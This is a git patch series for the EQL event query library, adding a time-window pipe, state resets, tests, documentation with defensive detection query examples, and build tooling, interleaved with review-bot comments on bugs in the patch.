@@ -460,20 +460,32 @@ def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) - if len(node.arguments) == 0: # Counting only the total summary = {'key': 'totals', 'count': 0} - hosts = set() + + # mutable scoped variable + hosts = [set()] def count_total_callback(events): if events is PIPE_EOF: - if len(hosts): - summary['total_hosts'] = len(hosts) - summary['hosts'] = list(sorted(hosts)) + # immutable version of summary + event = summary.copy() + + if len(hosts[0]): + event['total_hosts'] = len(hosts[0]) + event['hosts'] = list(sorted(hosts[0])) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)]) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) next_pipe(PIPE_EOF) + + # reset state + summary['count'] = 0 + if len(hosts[0]): + del summary['hosts'] + del summary['total_hosts'] + hosts[0] = set() else: summary['count'] += 1 if host_key in events[0].data: - hosts.add(events[0].data[host_key]) + hosts[0].add(events[0].data[host_key]) return count_total_callback @@ -503,6 +515,9 @@ def count_tuple_callback(events): # type: (list[Event]) -> None details['percent'] = float(details['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, details)]) next_pipe(PIPE_EOF) + + # reset state + count_table.clear() else: key = get_key(events) insensitive_key = remove_case(key) 
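Review bot: The reset branch of `count_total_callback` deletes `summary['hosts']` and `summary['total_hosts']`, but those keys are only ever written to the `event` copy, never to `summary`, so the first finalize that has seen any host raises `KeyError` right after the results and `PIPE_EOF` have gone downstream. The lines `if len(hosts[0]):` / `del summary['hosts']` / `del summary['total_hosts']` should simply be removed, leaving `summary['count'] = 0` and the host reset as the whole reset step. The one-element `hosts` list is also unnecessary: a plain set can be cleared in place with `hosts.clear()` without rebinding, which is what the other pipes in this commit do. `_convert_count_pipe` starts before this hunk.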
@@ -526,18 +541,20 @@ def filter_callback(events): # type: (list[Event]) -> None return filter_callback def _convert_head_pipe(self, node, next_pipe): # type: (HeadPipe, callable) -> callable - totals = [0] # has to be mutable because of python scoping + output_buffer = [] max_count = node.count def head_callback(events): - if totals[0] < max_count: - if events is PIPE_EOF: - next_pipe(PIPE_EOF) - else: - totals[0] += 1 - next_pipe(events) - if totals[0] == max_count: - next_pipe(PIPE_EOF) + if events is PIPE_EOF: + for output in output_buffer: + next_pipe(output) + next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() + else: + if len(output_buffer) < max_count: + output_buffer.append(events) return head_callback @@ -549,6 +566,9 @@ def tail_callback(events): for output in output_buffer: next_pipe(output) next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) @@ -569,6 +589,9 @@ def get_converted_key(buffer_events): for output in output_buffer: next_pipe(output) next_pipe(PIPE_EOF) + + # reset state + output_buffer.clear() else: output_buffer.append(events) @@ -581,6 +604,9 @@ def _convert_unique_pipe(self, node, next_pipe): # type: (UniquePipe, callable) def unique_callback(events): if events is PIPE_EOF: next_pipe(PIPE_EOF) + + # reset state + seen.clear() else: key = get_unique_key(events) if key not in seen: 
@@ -589,6 +615,32 @@ def unique_callback(events): return unique_callback + def _convert_window_pipe(self, node, next_pipe): # type: (WindowPipe) -> callable + """Aggregate events over a sliding window using a buffer.""" + window_buf = deque() # tuple of (timestamp, events) + timespan = self.convert(node.timespan) + + def time_window_callback(events): # type: (list[Event]) -> None + if events is PIPE_EOF: + next_pipe(PIPE_EOF) + + # reset state + window_buf.clear() + else: + minimum_start = events[0].time - timespan + + # Remove any events that no longer sit within the time window + while len(window_buf) > 0 and window_buf[0][0] < minimum_start: + window_buf.popleft() + + window_buf.append((events[0].time, events)) + + for result in window_buf: + next_pipe(result[1]) + next_pipe(PIPE_EOF) + + return time_window_callback + def _convert_unique_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" host_key = self.host_key @@ -610,6 +662,8 @@ def count_unique_callback(events): # type: (list[Event]) -> None next_pipe(result) next_pipe(PIPE_EOF) + # reset state + results.clear() else: # Create a copy of these, because they can be modified events = [events[0].copy()] + events[1:] @@ -645,12 +699,19 @@ def _reduce_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: hosts = result.pop('hosts') # type: set + + # immutable version of result + event = result.copy() if len(hosts) > 0: - result['hosts'] = list(sorted(hosts)) - result['total_hosts'] = len(hosts) + event['hosts'] = list(sorted(hosts)) + event['total_hosts'] = len(hosts) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) next_pipe(PIPE_EOF) + + # reset state + result['count'] = 0 + result['hosts'] = set() else: piece = events[0].data result['count'] += piece['count'] 
@@ -681,6 +742,9 @@ def count_tuple_callback(events): # type: (list[Event]) -> None result['percent'] = float(result['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) next_pipe(PIPE_EOF) + + # reset state + results.clear() else: piece = events[0].data key = events[0].data['key'] diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index c96404a..c3186d1 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -174,6 +174,7 @@ function_call::FunctionCall atom = + | time_unit | literal | field ; diff --git a/eql/pipes.py b/eql/pipes.py index f35ba50..529d601 100644 --- a/eql/pipes.py +++ b/eql/pipes.py @@ -1,5 +1,5 @@ """EQL Pipes.""" -from .ast import PipeCommand +from .ast import PipeCommand, TimeRange from .schema import Schema, EVENT_TYPE_GENERIC from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type from .utils import is_string @@ -14,6 +14,7 @@ "CountPipe", "FilterPipe", "UniqueCountPipe", + "WindowPipe" ) @@ -152,3 +153,27 @@ class FilterPipe(PipeCommand): def expression(self): """Get the filter expression.""" return self.arguments[0] + + +@PipeCommand.register('window') +class WindowPipe(PipeCommand): + """Maintains a time window buffer for streaming events.""" + + argument_types = [literal(NUMBER)] + + minimum_args = 1 + maximum_args = 1 + + @property + def timespan(self): + """Get timespan as a TimeRange object.""" + return TimeRange.convert(self.arguments[0]) + + @classmethod + def validate(cls, arguments, type_hints=None): + """After performing type checks, validate that the timespan is greater than zero.""" + index, arguments, type_hints = super(WindowPipe, cls).validate(arguments, type_hints) + ts = cls(arguments).timespan + if index is None and (ts is None or ts.delta.total_seconds() <= 0): + index = 0 + return index, arguments, type_hints diff --git a/tests/test_parser.py b/tests/test_parser.py index 0ba1544..267eff9 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py 
@@ -196,6 +196,7 @@ def test_valid_queries(self): 'any where true | unique a b c | sort a b c | count', 'any where true | unique a, b, c | sort a b c | count', 'any where true | unique a, b, c | sort a,b,c | count', + 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', 'file where child of [registry where true]', 'file where event of [registry where true]', 'file where event of [registry where true]', @@ -273,6 +274,8 @@ def test_invalid_queries(self): 'process where process_name == "abc.exe" | head abc', 'process where process_name == "abc.exe" | head abc()', 'process where process_name == "abc.exe" | head abc(def, ghi)', + 'process where process_name == "abc.exe" | window abc', + 'process where process_name == "abc.exe" | window 10g', 'sequence [process where pid == pid]', 'sequence [process where pid == pid] []', 'sequence with maxspan=false [process where true] [process where true]', diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 9fe0425..c59ba53 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py 
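Review bot: The new invalid cases cover an unparseable argument (`window abc`) and an unknown unit (`window 10g`) but not the zero-length span that `WindowPipe.validate` rejects via `ts.delta.total_seconds() <= 0`, which is otherwise untested in this series. Adding `'process where process_name == "abc.exe" | window 0s',` beside them should exercise that branch, assuming `0s` parses to an empty `timedelta` as `walk__time_range` suggests. `test_invalid_queries` starts before this hunk.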
@@ -518,3 +518,44 @@ def test_mutli_line_functions(self): self.assertTrue(Wildcard.run(source, "this*is*comment")) self.assertTrue(Wildcard.run(source, "t*a*c*")) self.assertFalse(Wildcard.run(source, "MiSsInG")) + + def test_pipes_reset_state(self): + """Test that the pipes are clearing their state after receiving PIPE_EOF""" + events = self.get_events() + + queries = [ + 'process where true | unique opcode', + 'process where true | unique_count opcode', + 'process where true | unique_count', + 'process where true | count', + 'process where true | count opcode', + 'process where true | head 1', + 'process where true | tail', + 'process where true | sort opcode', + 'process where true | window 10s', + 'process where true | window 5m | head 1', + ] + + for query in queries: + engine = PythonEngine() + + results = [] # type: list[Event] + engine.add_output_hook(results.append) + engine.add_queries([parse_query(query)]) + + engine.stream_events(events) + engine.finalize() + expected_len = len(results) + + results.clear() + + engine.stream_events(events) + engine.finalize() + actual_len = len(results) + + self.assertEquals( + expected_len, + actual_len, + f"Expected results to be same when streaming events multiple times {query}" + ) + From 5d394c791ed8d063a24bd48a9f1dd8de206954a7 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Fri, 18 Oct 2019 23:59:58 +0100 Subject: [PATCH 07/13] Updated the documentation and test cases. --- docs/query-guide/pipes.rst | 27 +++++++++++++++++++++++++++ eql/etc/test_queries.toml | 22 ++++++++++++++++++++++ 2 files changed, 49 insertions(+) diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index 0df657a..c664a7c 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst 
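Review bot: `test_pipes_reset_state` compares only the number of results between the two runs, so a pipe that resets its counters but leaks, say, an entry in `seen` or a key in `count_table` would still pass as long as it produced the same number of events; keeping the first run's output (`expected = list(results)`) and asserting the second run matches it, e.g. on `[e.data for e in results]` if `Event` has no equality, pins the actual behaviour. `assertEquals` is a deprecated alias and should be `assertEqual`. The f-string message and `results.clear()` are Python 3 only; if the package still targets Python 2 (the `# type:` comments elsewhere suggest it might), use `.format()` and `del results[:]`.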
@@ -124,3 +124,30 @@ Get the top five network connections that transmitted the most data | sort total_out_bytes | tail 5 +``window`` +--------- +The ``window`` pipe will buffer events based on the timespan specify, which allows other pipes to function on a sliding +window. This allows pipes to function when streaming data continuously. + +Find suspicious recon commands that were executed within a 5 minute window + .. code-block:: eql + + process where process_name in ("whoami.exe", "netstat.exe", "hostname.exe", "net.exe", "sc.exe", "systeminfo.exe") + | window 5m + | unique process_name + | unique_count + | filter count >= 3 + +Find processes that have network connections to a single host with over 100 unique ports within a 10 second window + .. code-block:: eql + + network where destination_address in ("10.*", "172.*", "192.*") + | window 10s + | unique_count process_name, destination_port + | filter count >= 100 + +.. note:: + + The window pipe will emit all events within the window buffer from the first event, meaning events will appear like + so: [[1], [1,2], [1,2,3], ...]. Therefore, it is recommended to use a combination of ``unique_count`` and + ``filter`` to only show events over a certain threshold. diff --git a/eql/etc/test_queries.toml b/eql/etc/test_queries.toml index fd17691..833528a 100644 --- a/eql/etc/test_queries.toml +++ b/eql/etc/test_queries.toml 
@@ -1127,3 +1127,25 @@ expected_event_ids = [57] query = ''' registry where arrayContains(bytes_written_string_list, "ross", "en-US") ''' + +[queries.q169] +expected_event_ids = [11, 50] +description = "test window pipe" +query = ''' +process where subtype == "create" | +window 5m | +unique parent_process_name, process_name | +unique_count parent_process_name | +filter count == 5 +''' + +[queries.q170] +expected_event_ids = [55] +description = "test window pipe with descendant" +query = ''' +file where event_subtype_full == "file_create_event" + and descendant of [process where process_name == "cmd.exe"] | + window 5m | + unique_count process_name | + filter count == 5 +''' From 6f24caf334b051cf25ba93d49b98cd07bc91c359 Mon Sep 17 00:00:00 2001 
From: Carl Rutherford Date: Sat, 19 Oct 2019 00:02:02 +0100 Subject: [PATCH 08/13] # Conflicts: # docs/query-guide/pipes.rst # eql/ast.py # eql/engine.py # eql/parser.py # setup.cfg # tests/test_data.json # tests/test_eql.py # tests/test_python_engine.py --- .github/ISSUE_TEMPLATE/bug_report.md | 22 + .github/ISSUE_TEMPLATE/feature_request.md | 12 + .github/PULL_REQUEST_TEMPLATE.md | 6 + .gitignore | 3 + CHANGELOG.md | 67 + CONTRIBUTING.md | 59 + Makefile | 73 +- README.md | 14 +- docs/_static/example.json | 65 +- docs/api/ast.rst | 21 +- docs/cli.rst | 37 +- docs/conf.py | 62 +- docs/index.rst | 6 +- docs/licenses.rst | 7 +- docs/query-guide/basic-syntax.rst | 16 +- docs/query-guide/functions.rst | 17 +- docs/query-guide/implementation.rst | 9 +- docs/query-guide/pipes.rst | 24 +- docs/resources.rst | 32 +- eql/__init__.py | 123 +- eql/ast.py | 490 +- eql/{engines => }/build.py | 15 +- eql/{engines/native.py => engine.py} | 495 +- eql/engines/__init__.py | 11 - eql/errors.py | 44 +- eql/etc/eql.ebnf | 47 +- eql/etc/schema.json | 11 - eql/etc/test_data.json | 2080 + eql/etc/test_queries.toml | 1151 + eql/events.py | 43 + eql/functions.py | 452 +- eql/highlighters.py | 68 + eql/loader.py | 6 +- eql/main.py | 90 +- eql/parser.py | 990 +- eql/pipes.py | 179 + eql/schema.py | 318 +- eql/shell.py | 748 + eql/signatures.py | 37 + eql/table.py | 286 + eql/tests/__init__.py | 9 + {tests => eql/tests}/base.py | 71 +- eql/{engines/base.py => transpilers.py} | 113 +- eql/types.py | 213 + eql/utils.py | 174 +- eql/walkers.py | 238 + requirements.txt | 3 +- requirements_test.txt | 10 +- setup.cfg | 5 +- setup.py | 56 +- tests/test_ast.py | 95 + tests/test_cli.py | 97 +- tests/test_data.json | 159600 ------------------- tests/test_eql.py | 697 - tests/test_optimizations.py | 168 + tests/test_parser.py | 364 + tests/test_preprocessor.py | 229 + tests/test_python_engine.py | 216 +- tests/test_queries.json | 1 - tests/test_schema.py | 231 + tests/test_type_system.py | 117 + 
tests/test_utils.py | 101 + 62 files changed, 9427 insertions(+), 161617 deletions(-) create mode 100644 .github/ISSUE_TEMPLATE/bug_report.md create mode 100644 .github/ISSUE_TEMPLATE/feature_request.md create mode 100644 .github/PULL_REQUEST_TEMPLATE.md create mode 100644 CHANGELOG.md create mode 100644 CONTRIBUTING.md rename eql/{engines => }/build.py (91%) rename eql/{engines/native.py => engine.py} (79%) delete mode 100644 eql/engines/__init__.py delete mode 100644 eql/etc/schema.json create mode 100644 eql/etc/test_data.json create mode 100644 eql/etc/test_queries.toml create mode 100644 eql/events.py create mode 100644 eql/highlighters.py create mode 100644 eql/pipes.py create mode 100644 eql/shell.py create mode 100644 eql/signatures.py create mode 100644 eql/table.py create mode 100644 eql/tests/__init__.py rename {tests => eql/tests}/base.py (50%) rename eql/{engines/base.py => transpilers.py} (64%) create mode 100644 eql/types.py create mode 100644 eql/walkers.py create mode 100644 tests/test_ast.py delete mode 100644 tests/test_data.json delete mode 100644 tests/test_eql.py create mode 100644 tests/test_optimizations.py create mode 100644 tests/test_parser.py create mode 100644 tests/test_preprocessor.py delete mode 100644 tests/test_queries.json create mode 100644 tests/test_schema.py create mode 100644 tests/test_type_system.py diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 0000000..4b34728 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md 
@@ -0,0 +1,22 @@ +--- +name: Bug report +about: File a bug +labels: bug + +--- + +### Describe the bug +A clear and concise description of what the bug is. + +#### To Reproduce +Steps to reproduce the behavior: +1. Go to '...' +2. Click on '....' +3. Scroll down to '....' +4. See error + +#### Expected behavior +A clear and concise description of what you expected to happen. + +#### Screenshots +If applicable, add screenshots to help explain your problem. diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 0000000..0d29dd7 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,12 @@ +--- +name: Feature Request +about: Suggest changes to syntax, functions, pipes, or the API +labels: feature-request + +--- + +## New Feature Description +* *Are you interesting in a new function, e.g. arrayContains, startsWith, wildcard?* +* *Are you proposing grammar or parser changes?* +* *What features do you want to add to the CLI?* +* *Are there changes to the evaluation engine?* diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 0000000..e898b96 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,6 @@ + + +## Issues + +## Details +*Describe details about your requested changes* diff --git a/.gitignore b/.gitignore index dfc995a..2ef397a 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,10 @@ +/eql/_parsergen.py + # PyCharm junit.xml /.idea/ + # Visual Studio Code /.vscode diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..a5a1acc --- /dev/null +++ b/CHANGELOG.md 
@@ -0,0 +1,67 @@ +# Event Query Language - Changelog +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/). + +## Version 0.7 +_Released 2019-07-24_ + +### Added +* Badges to README (PyPi, Twitter, ReadTheDocs, Gitter) +* Multiple values within `arrayContains()` function +* `arrayCount` function for counting the number of matches in an array +* Interactive shell with tables +* Validation system that matches types across schema and comparisons +* `SignatureMixin` class used to validate input and output arguments to functions, and pipes +* Better error messages with multiple carets +* Base class for all EQL errors +* Test data, queries, and the expected output for unit tests +* Signature base class +* Helper `Walker` classes with better methods and context for AST traversal +* `ParserConfig` class with context manager that toggles thread-specific parser settings +* Additional imports to the root `eql` module +* Autogenerated parser with `make parser` included in python module +* `is_stateful` function to `eql.utils` to determine if a parsed query is stateful +* `match_kv` function to `eql.utils` to autogenerate an AST from a dictionary of fields -> value(s) + +### Changed +* Rearranged imports, `eql.engines.native` is now `eql.engine` +* Using walker methods instead of NodeMethods to integrate with engine +* Moved function call evaluation to custom classes in `eql.functions` +* Moved highlighter from sphinx document generation to `eql.highlighters` +* Moved PipeCommand subclasses to `eql.pipes` +* Exception class names to all have **Eql** prefix +* Moved unit tests to `eql.tests` module and rearranged test +* Implementation of `by` for sequences, joins and pipes to perform case-insensitive checks + +### Fixed +* Bug where wildcards were only matched on the first line of text in a field + +### Removed +* Default EQL schema. 
Now accepts all input and event types by default + +## Version 0.6.3 +_Released 2019-04-17_ + +### Added +* @itsnotapt Made `pid` and `ppid` fields configurable + +## Version 0.6.2 +_Released 2018-12-13_ + +### Fixed +* Broken implementation of streaming .jsonl files + +## Version 0.6.1 +_Released 2019-12-05_ + +## Added +* Support for gzipped files + +## Version 0.6 +_Initial Release 2018-11_30_ + +### Added (Initial Features) +* EQL parser with Tatsu +* Evaluation engine in `eql.engines.native` +* Macro and constants for preprocessors +* `eql` CLI command for querying against a JSON file +* Security schema by default (`file`, `network`, `process`, etc.) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..1319f31 --- /dev/null +++ b/CONTRIBUTING.md 
@@ -0,0 +1,59 @@ +# EQL Contribution Guide +Welcome to the Event Query Language (EQL) contribution guide and thank you for expressing an interest in contributing to EQL! + +As a quick refresher, the Event Query Language (EQL) was built by Endgame to express relationships between events. It is data source and platform agnostic, includes the ability to ask stateful questions, and enables sifting and stacking of data with unix-like pipes. + +The EQL community consists of two main components +* This repository, which houses the underlying language and evaluation engine +* An [Analytics Library](https://eqllib.readthedocs.io/), which contains detections and hunting strategies. + +Contributions to extend core capabilities of the language are directed to [``eql``](https://github.com/endgameinc/eql). For new detections, hunts, data sources, or knowledge sharing, please read the guidelines below before contributing. + +# Table of Contents +1. [Contribution Process](#contribution-process) +2. [Ways to Contribute](#ways-to-contribute) +3. [Resources](#resources) +4. [Licenses](#licenses) + +## Contribution Process +Contributing to EQL is a simple five-step process facilitated by Git: + +1. Create an [issue](https://github.com/endgameinc/eqllib/issues) to track and discuss the work +2. Create a [branch](https://help.github.com/en/articles/about-branches) +3. Submit a [pull request](https://help.github.com/en/articles/about-pull-requests) +4. Update according to the code review +5. [Merge](https://help.github.com/en/articles/merging-a-pull-request) after approval. + +### Additional Notes +* If you are accustomed to git, then great! If you aren't, don't fear, the command line tools are easy to use, but GitHub also has a straightforward process within your web browser to create branches and subsequent merging +* Use the Issues and PR templates! 
Git [Issues](https://github.com/endgameinc/eql/issues) are a great place to collaborate, discuss, or just track a request before development begins. +* There is plenty of literature and resources out there to help you. A great place to start is [GitHub guides](https://guides.github.com/). + +## Ways to contribute + +### Bug Fixes +Bug fixes are a natural area to contribute. We only ask that you please use the [bug report issue](https://github.com/endgameinc/eql/issues) to track the bug. Please elaborate on how to reproduce the bug and what behavior you would have expected. Compatibility is a priority for EQL, so be sure to capture information about your operating system and version of python. + +### Language or Engine Changes +For any changes within the language or the evaluation engine, propose your changes in a *Feature Request* issue to start a discussion. For new functionality function, be mindful of handling different edge cases, acceptable input, etc. We are happy to collaborate on such topics and encourage you to share ideas. + +Some types of core development include: +* Syntax changes: This can be an entirely new construct ranging from high level constructs (e.g. sequence, join), to smaller changes (e.g. adding binary operators). +* Pipes: pipes usually can be added without needing to make syntax changes. Some pipes may stream output while processing, and others track state and only output when all input is finished (e.g. count). +* Functions: functions can be easily extended without needing to recommend changes to the syntax +* API: You may also want to add new APIs, utility functions, etc. like `is_stateful` + +Anyone is encouraged to make a PR for open issues that have a clear path forward. When making changes, be sure to +* Link back to the issue "Resolves #100" +* Include unit tests in the relevant tests/ folder. +* Include end-to-end tests by updating the test [data](eql/etc/test_data.json) and [queries](eql/etc/test_queries.toml). 
These are used as the gold standard of expected behavior, and the queries should have a list of the serial_event_id of the events, in the expected order. + +### CLI +Finally, the CLI is an area we are always looking to expand. This may include new input file types, new processing features, new tables, etc. Some shell functionality, like tab completions ANSI coloring, and history often varies across different operating systems. If possible, please test new functionality across a few different operating systems if you have access, and Python 2.7 and 3.6+. If you find any unusual behavior in the shell related to compatibility, please let us know in an issue. + +## Resources +See the [resources page](https://eql.readthedocs.io/en/latest/resources.html) on ReadTheDocs for a full list of resources + + +## Licenses +The Event Query Language is licensed under [AGPL](LICENSE) diff --git a/Makefile b/Makefile index 460621d..2a7c415 100644 --- a/Makefile +++ b/Makefile 
@@ -2,36 +2,83 @@ ### EQL ################# -VENV := ./eql-env +VENV := ./env/eql-build VENV_BIN := $(VENV)/bin PYTHON := $(VENV_BIN)/python -PIP := $(VENV_BIN)/pip +PIP := $(PYTHON) -m pip +SPHINXBUILD ?= $(VENV_BIN)/sphinx-build +VERSION ?= -init: +PARSER_FILE := eql/_parsergen.py + + +$(VENV): pip install virtualenv virtualenv $(VENV) - $(VENV_BIN)/pip install -q -r requirements.txt + $(PIP) install -q -r requirements.txt + $(PIP) install setuptools -U + + +$(PARSER_FILE): $(VENV) + $(PYTHON) -m tatsu eql/etc/eql.ebnf -o $(PARSER_FILE) + +.PHONY: parser +parser: $(PARSER_FILE) + +.PHONY: clean clean: - rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox + rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox *.egg-info .coverage coverage.xml junit.xml .pytest_cache $(PARSER_FILE) + find . -type f -name '*.pyc' -delete + find . -type f -name '__pycache__' -delete + +.PHONY: testdeps +testdeps: + $(PIP) install -r requirements_test.txt -test: +.PHONY: pytest +pytest: $(VENV) parser testdeps $(PYTHON) setup.py -q test -lint: + +.PHONY: pylint +pylint: $(VENV) parser testdeps $(PYTHON) setup.py -q lint -sdist: + +.PHONY: test +test: $(VENV) pylint pytest + + +.PHONY: sdist +sdist: $(VENV) parser $(PYTHON) setup.py sdist -bdist_egg: + +.PHONY: bdist_egg +bdist_egg: $(VENV) parser $(PYTHON) setup.py bdist_egg -bdist_wheel: + +.PHONY: bdist_wheel +bdist_wheel: $(VENV) parser $(PYTHON) setup.py bdist_wheel + +.PHONY: install +install: $(VENV) parser + $(PYTHON) setup.py install + +.PHONY: all +all: sdist + .PHONY: docs -docs: +docs: $(VENV) install $(PIP) install sphinx sphinx_rtd_theme - $(PYTHON) setup.py install - $(VENV_BIN)/activate; cd docs; make html + cd docs && ../$(SPHINXBUILD) -M html . _build + + +.PHONY: upload +upload: $(VENV) + $(PIP) install twine~=1.13 + $(VENV_BIN)/twine upload dist/* diff --git a/README.md b/README.md index d964e45..cd0a0f7 100644 --- a/README.md +++ b/README.md 
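Review bot: In the new `clean` target, `find . -type f -name '__pycache__' -delete` can never match anything, because `__pycache__` entries are directories, and `-delete` would refuse a non-empty directory anyway; the working form is `find . -type d -name '__pycache__' -prune -exec rm -rf {} +`. The same `rm -rf` line also lists `*.egg-info` twice. The `upload` target publishes whatever already sits in `dist/*` with no build prerequisite, so a stale or locally modified artifact from an earlier run can be uploaded; making it depend on `sdist bdist_wheel` keeps what is published reproducible from the checked-out source. `$(PIP) install twine~=1.13` and `$(PIP) install setuptools -U` pull unpinned versions into the build environment at run time; pinning them in a requirements file alongside `requirements.txt` is the usual supply-chain hygiene for a release path.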
@@ -1,7 +1,11 @@ # Event Query Language -See https://eql.readthedocs.io for documentation +[![PyPI](https://img.shields.io/pypi/v/eql.svg)](https://pypi.python.org/pypi/eql) +[![Gitter](https://badges.gitter.im/eventquerylang/community.svg)](https://gitter.im/eventquerylang/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) +[![Documentation](https://readthedocs.org/projects/eql/badge/?version=latest)](https://eql.readthedocs.io/en/latest/?badge=latest) -![](docs/_static/eql-whoami.jpg "What is EQL") +[![Twitter Follow](https://img.shields.io/twitter/follow/eventquerylang.svg?style=social)](https://twitter.com/eventquerylang) + +![What is EQL?](docs/_static/eql-whoami.jpg) Browse a [library of EQL analytics](https://eqllib.readthedocs.io) # Getting Started 
@@ -16,18 +20,18 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av ```console $ eql --version -eql 0.6.3 +eql 0.7.0 ``` From there, try a [sample json file](docs/_static/example.json) and test it with EQL. ```console $ eql query -f example.json "process where process_name == 'explorer.exe'" -{"command_line": "C:\\Windows\\Explorer.EXE", "event_subtype_full": "already_running", "event_type_full": "process_event", "md5": "ac4c51eb24aa95b77f705ab159189e24", "opcode": 3, "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "serial_event_id": 34, "timestamp": 131485997150000000, "unique_pid": 34, "unique_ppid": 0, "user_domain": "research", "user_name": "researcher"} +{"command_line": "C:\\Windows\\Explorer.EXE", "event_type": "process", "md5": "ac4c51eb24aa95b77f705ab159189e24", "pid": 2460, "ppid": 3052, "process_name": "explorer.exe", "process_path": "C:\\Windows\\explorer.exe", "subtype": "create", "timestamp": 131485997150000000, "user": "research\\researcher", "user_domain": "research", "user_name": "researcher"} ``` # Next Steps - Browse a [library of EQL analytics](https://eqllib.readthedocs.io) - Check out the [query guide](https://eql.readthedocs.io/en/latest/query-guide/index.html) for a crash course on writing EQL queries -- View usage for the [CLI](https://eql.readthedocs.io/en/latest/cli.html) +- View usage for interactive [shell](https://eql.readthedocs.io/en/latest/cli.html) - Explore the [API](https://eql.readthedocs.io/en/latest/api/index.html) for advanced usage or incorporating EQL into other projects diff --git a/docs/_static/example.json b/docs/_static/example.json index 2832a60..d0ece8b 100644 --- a/docs/_static/example.json +++ b/docs/_static/example.json 
@@ -1,124 +1,103 @@ [ { - "event_subtype_full": "already_running", - "event_type_full": "process_event", - "opcode": 3, + "event_type": "process", "parent_process_name": "System Idle Process", "pid": 4, "process_name": "System", - "serial_event_id": 2, + "subtype": "create", "timestamp": 131485996510000000, - "unique_pid": 2, - "unique_ppid": 1, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "wininit.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "94355c28c1970635a31b3fe52eb7ceba", - "opcode": 3, "pid": 424, "ppid": 364, "process_name": "wininit.exe", "process_path": "C:\\Windows\\System32\\wininit.exe", - "serial_event_id": 5, + "subtype": "create", "timestamp": 131485996510000000, - "unique_pid": 5, - "unique_ppid": 0, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "winlogon.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "1151b1baa6f350b1db6598e0fea7c457", - "opcode": 3, "pid": 472, "ppid": 416, "process_name": "winlogon.exe", "process_path": "C:\\Windows\\System32\\winlogon.exe", - "serial_event_id": 7, + "subtype": "create", "timestamp": 131485996510000000, - "unique_pid": 7, - "unique_ppid": 0, + "user": "NT AUTHORITY\\SYSTEM", "user_domain": "NT AUTHORITY", "user_name": "SYSTEM" }, { "command_line": "C:\\Windows\\system32\\services.exe", - "event_subtype_full": "already_running", - "event_type_full": "process_event", + "event_type": "process", "md5": "24acb7e5be595468e3b9aa488b9b4fcb", - "opcode": 3, "parent_process_name": "wininit.exe", "parent_process_path": "C:\\Windows\\System32\\wininit.exe", "pid": 524, "ppid": 424, "process_name": "services.exe", "process_path": "C:\\Windows\\System32\\services.exe", - "serial_event_id": 8, + "subtype": "create", "timestamp": 131485996520000000, - 
